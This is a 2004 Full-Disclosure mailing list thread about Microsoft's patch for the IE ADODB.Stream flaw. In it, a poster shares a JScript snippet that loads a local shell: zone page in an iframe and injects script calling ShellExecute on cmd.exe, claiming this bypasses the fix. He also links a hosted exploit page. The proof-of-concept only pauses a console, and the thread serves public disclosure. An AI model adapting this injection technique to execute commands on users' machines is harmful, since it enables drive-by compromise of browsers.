[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: Betr.: Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out

To: "'Pascal Zoutendijk'" <Pascal.Zoutendijk@xxxxxxx>, hescominsoon@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Subject: RE: Betr.: Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out
From: Jelmer <jkuperus@xxxxxxxxx>
Date: Fri, 02 Jul 2004 23:34:55 +0200

Because we avoid the adodb.stream issue all together,
You can patch it, but if you leave open other issues, well it's pointless
Instead we just swap in this instead of the old shellcode:


-- snip --

function injectIt() {
 
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<s
cript language="JScript" DEFER>var obj=new
ActiveXObject("Shell.Application");obj.ShellExecute("cmd.exe","/c
pause");</script>');
}
document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);

--snip--


And it's working again, how long did it take? What like an hour since
Microsoft's announcement ?




-----Original Message-----
From: Pascal Zoutendijk [mailto:Pascal.Zoutendijk@xxxxxxx] 
Sent: vrijdag 2 juli 2004 23:28
To: hescominsoon@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; jkuperus@xxxxxxxxx
Cc: helmut_hauser@xxxxxxxxxxx; full-disclosure@xxxxxxxxxxxxxxxx
Subject: Betr.: Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability
is out

what you should be getting (assuming the patch does work) is something like
the
following:

line: 3
char: 3
Error: Access is denied
Code: 0

etc...

dunno why it doesn't work on some systems though.

Met vriendelijke groet,

Pascal Zoutendijk
TBWA \ ICT Services
Prof W.H. Keesomlaan 8
1183 DJ  Amstelveen, the Netherlands
Tel: +31205715300
Fax:+31205715639
>>> William Warren <hescominsoon@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx> 02-07-04
22:24
>>>
i have a athlon xp 2000+ not a slow system.  I am running ie6 sp1 
all patched up..for this test..my mzin browser is mozilla 
obviously mozilla is immune to this one..:)

Jelmer wrote:

> That depends, are you using firefox? ;)
> 
> It works on my ie6 sp1 + latest and greatest *cough* patches
> It does however use settimeout, maybe you have a low end system, and you
> need a longer wait, just try reloading it a couple of times
> 
> 
> -----Original Message-----
> From: full-disclosure-admin@xxxxxxxxxxxxxxxx
> [mailto:full-disclosure-admin@xxxxxxxxxxxxxxxx] On Behalf Of William
Warren
> Sent: vrijdag 2 juli 2004 20:47
> To: Jelmer
> Cc: 'Helmut Hauser'; full-disclosure@xxxxxxxxxxxxxxxx
> Subject: Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is
out
> 
> this returns an error..is that all it is supposed to do?
> 
> 
> Jelmer wrote:
> 
> 
>>Too bad it won't do you one ounce any good
>>
>>http://62.131.86.111/security/idiots/malware2k/installer.htm
>>
>>Credit: http-equiv
>>
>>
>>
>>
>>-----Original Message-----
>>From: full-disclosure-admin@xxxxxxxxxxxxxxxx
>>[mailto:full-disclosure-admin@xxxxxxxxxxxxxxxx] On Behalf Of Helmut Hauser
>>Sent: vrijdag 2 juli 2004 18:39
>>To: full-disclosure@xxxxxxxxxxxxxxxx
>>Subject: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out
>>
>>
>>
> 
>
http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=4d05
> 
>>6748-c538-46f6-b7c8-2fbfd0d237e3
>>
>>Better late than never ...
>>
>>Helmut Hauser
>>
>>_______________________________________________
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.netsys.com/full-disclosure-charter.html
>>
>>
>>_______________________________________________
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.netsys.com/full-disclosure-charter.html
>>
> 
> 

-- 
My "Foundation" verse:
Isa 54:17  No weapon that is formed against thee shall prosper; 
and every tongue that shall rise against thee in judgment thou 
shalt condemn. This is the heritage of the servants of the LORD, 
and their righteousness is of me, saith the LORD.

-- carpe ductum -- "Grab the tape"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_____________________________________________________________________
This message has been checked for all known viruses.


_____________________________________________________________________
This message has been checked for all known viruses.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- Re: Betr.: Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out
  - From: Matthew Murphy
- RE: Betr.: Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out
  - From: Mr. John

Prev by Date: Betr.: Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out
Next by Date: Re: [Full-Disclosure] Presidential Candidates' Websites Vulnerable
Previous by thread: Betr.: Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out
Next by thread: Re: Betr.: Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out
Index(es):
- Date
- Thread